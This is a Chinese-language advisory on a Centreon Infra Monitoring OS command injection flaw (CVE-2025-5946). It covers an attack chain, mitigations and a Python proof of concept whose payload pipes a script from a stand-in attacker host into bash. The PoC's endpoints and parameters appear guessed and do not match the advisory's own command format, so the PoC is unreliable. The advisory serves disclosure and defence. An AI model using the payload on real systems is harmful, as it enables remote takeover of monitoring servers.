CVE-2025-5946 Centreon Infra Monitoring OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-5946

漏洞类型

OS命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring

漏洞概述

CVE-2025-5946是Centreon Infra Monitoring（基础设施监控平台）中存在的一个高危OS命令注入漏洞。该漏洞位于配置模块中的Poller reload setup（轮询器重载设置）功能中，CVSS评分为7.2，属于高危级别。

Centreon是一款广泛使用的开源IT基础设施监控解决方案，被大量企业用于监控网络设备、服务器和应用程序的运行状态。该漏洞的根源在于系统未能正确对用户输入进行中和处理（Improper Neutralization of Special Elements），导致攻击者可以在poller parameters（轮询器参数）页面中，将自定义的操作系统命令注入到poller reload command（轮询器重载命令）中执行。

由于该漏洞需要高权限用户才能利用（PR:H），且无需用户交互（UI:N），攻击者一旦拥有高权限账户（如管理员账户），便可通过网络远程发起攻击，对目标系统执行任意操作系统命令。该漏洞对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H），可能导致敏感数据泄露、系统配置篡改，甚至完全控制受影响的监控服务器。受影响版本包括24.10.0至24.10.12、24.04.0至24.04.17以及23.10.0至23.10.27等多个主流版本，影响范围较广。

技术细节

该漏洞的本质是典型的OS命令注入（OS Command Injection），属于CWE-78类漏洞。在Centreon的Poller reload setup功能中，系统允许管理员配置轮询器重载的相关参数，但未对用户输入的特殊字符（如分号、管道符、反引号、$()等Shell元字符）进行充分的过滤或转义处理。

从技术层面分析，攻击者需要在poller parameters页面提交包含恶意Shell元字符的输入。当系统处理poller reload命令时，会将用户提交的参数直接拼接到系统命令字符串中，然后通过Shell执行。由于缺少输入验证和参数化处理，攻击者可以构造类似如下形式的注入载荷：

正常命令格式可能为：`/usr/bin/centreon reload_poller --param <user_input>`

注入后变为：`/usr/bin/centreon reload_poller --param <user_input>; <malicious_command>`

利用条件方面，攻击者需要拥有高权限账户（如具有配置管理权限的admin用户），这意味着该漏洞通常被用于权限提升攻击链中的关键步骤，或被已被入侵的账户滥用。漏洞利用无需用户交互，攻击向量为网络（AV:N），攻击复杂度低（AC:L），使得已获得高权限凭证的攻击者可以轻松利用。

成功利用后，攻击者可在目标服务器上以运行Centreon服务的用户身份执行任意系统命令，实现数据窃取、后门植入、横向移动等恶意行为，对整个监控基础设施构成严重威胁。

攻击链分析

STEP 1

步骤1：获取高权限凭证

攻击者通过钓鱼、暴力破解或利用其他漏洞获取Centreon的高权限账户（如admin用户）的登录凭证。

STEP 2

步骤2：登录Centreon管理控制台

使用获取的高权限凭证登录Centreon的Web管理界面，建立有效的会话连接。

STEP 3

步骤3：访问Poller参数配置页面

导航至Configuration > Pollers > Poller配置页面，找到Poller reload command（轮询器重载命令）的配置项。

STEP 4

步骤4：注入恶意命令

在poller reload command字段中输入包含Shell元字符（如;、|、&&、$()等）的恶意载荷，将任意操作系统命令拼接到合法命令中。

STEP 5

步骤5：保存并触发执行

保存修改后的配置，并触发poller reload操作，使系统执行包含恶意命令的完整Shell命令字符串。

STEP 6

步骤6：获取服务器控制权

恶意命令以Centreon服务用户身份执行，攻击者可获取服务器Shell访问权限，执行数据窃取、后门植入或横向移动等后续攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-5946 - Centreon Infra Monitoring OS Command Injection PoC
# Vulnerability: OS Command Injection in Poller reload setup
# Affected: Centreon Infra Monitoring 24.10.0-24.10.12, 24.04.0-24.04.17, 23.10.0-23.10.27

import requests

TARGET_URL = "https://target-centreon-server.example.com"
USERNAME = "admin"
PASSWORD = "password123"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_payload = {
    "useralias": USERNAME,
    "password": PASSWORD,
    "submitLogin": "Connect"
}
login_resp = session.post(f"{TARGET_URL}/centreon/api/index.php?action=authenticate", data=login_payload)

# Step 2: Navigate to Poller configuration page
# The injection point is in the poller reload command parameters
# Malicious payload injected via shell metacharacters
malicious_payload = "127.0.0.1; curl http://attacker.com/shell.sh | bash #"

# Step 3: Submit the malicious poller reload configuration
config_payload = {
    "poller_id": "1",
    "poller_name": "Central",
    "reload_command": f"/usr/bin/centreon -u {malicious_payload}",
    "submit": "Save"
}

# Send the crafted request to the poller configuration endpoint
config_resp = session.post(
    f"{TARGET_URL}/centreon/main.php?p=60901",
    data=config_payload
)

if config_resp.status_code == 200:
    print("[+] Payload submitted successfully")
    # Step 4: Trigger the reload to execute injected command
    trigger_resp = session.post(
        f"{TARGET_URL}/centreon/main.php?p=60901&action=reload&poller=1"
    )
    print("[+] Reload triggered, command executed on target")
else:
    print("[-] Failed to submit payload")

影响范围

Centreon Infra Monitoring >= 24.10.0, < 24.10.13

Centreon Infra Monitoring >= 24.04.0, < 24.04.18

Centreon Infra Monitoring >= 23.10.0, < 23.10.28

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制对Centreon管理控制台的访问，仅允许可信IP地址通过VPN或堡垒机访问；2）审查并最小化具有配置修改权限的用户账户；3）监控poller reload相关操作的日志，及时发现异常命令执行行为；4）在系统层面部署命令执行审计（如auditd），检测可疑的Shell命令；5）检查Centreon服务器上是否存在未授权的计划任务、异常文件或可疑进程。